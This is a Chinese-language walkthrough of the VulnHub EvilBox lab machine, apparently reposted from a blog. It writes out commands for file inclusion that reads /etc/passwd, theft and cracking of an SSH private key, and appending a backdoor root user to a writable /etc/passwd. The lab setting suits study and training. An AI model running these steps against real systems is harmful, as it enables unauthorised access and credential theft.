标签：权限 私钥 rsa EvilBox --- vulnhub txt root wfuzz

环境信息

靶机：192.168.124.138
攻击机：192.168.124.129

打靶过程

1.nmap扫描端口及服务

发现开放 22，80 端口

访问 80 端口，是 apache 的欢迎页面

2.目录扫描

访问 /robots.txt，发现疑似用户名“H4x0r”

访问 /secret/，是一个空白页面

那么就再扫描一下 /secret/ 目录，最终通过 dirb 扫描出 evil.php

访问 evil.php，也是一个空白页，这里猜测可以在后面加参数，就有可能涉及文件包含

3.wfuzz 爆破参数名

使用命令 wfuzz 爆破参数名，成功爆出参数名为“command”

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 0 http://192.168.124.138/secret/evil.php?FUZZ=/etc/passwd

4.文件包含

使用该参数名进行文件包含，发现一个用户“mowree”，但是不知道密码

该靶机开放了22端口，查看该用户下是否存在 ssh 私钥，发现确实存在私钥

5.私钥登录 ssh

下载私钥 id_rsa

使用ssh2john id_rsa > pass.txt命令编译私钥保存，
利用john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt破解出密码 unicorn

赋予 id_rsa 私钥 600 权限，指定 id_rsa 登录 ssh，输入密码 unicorn 成功登录

获得第一个 flag

6.提权

查看系统版本、可使用 sudo 执行权限的命令以及 suid，未发现可利用点

写入 root 权限用户

后发现 /etc/passwd 文件可写入，那就写入一个 root 权限的用户吧

先使用命令perl -le 'print crypt("pass","pass")'生成加盐密码

使用命令echo toor:pauONM/HSu9pM:0:0:root:/root:/bin/bash >>/etc/passwd写入带 root 权限的用户 toor，切换至 toor 用户，成功提权至 root 权限

成功获取 flag

标签：权限,私钥,rsa,EvilBox,---,vulnhub,txt,root,wfuzz
来源： https://www.cnblogs.com/r0ure/p/16546666.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。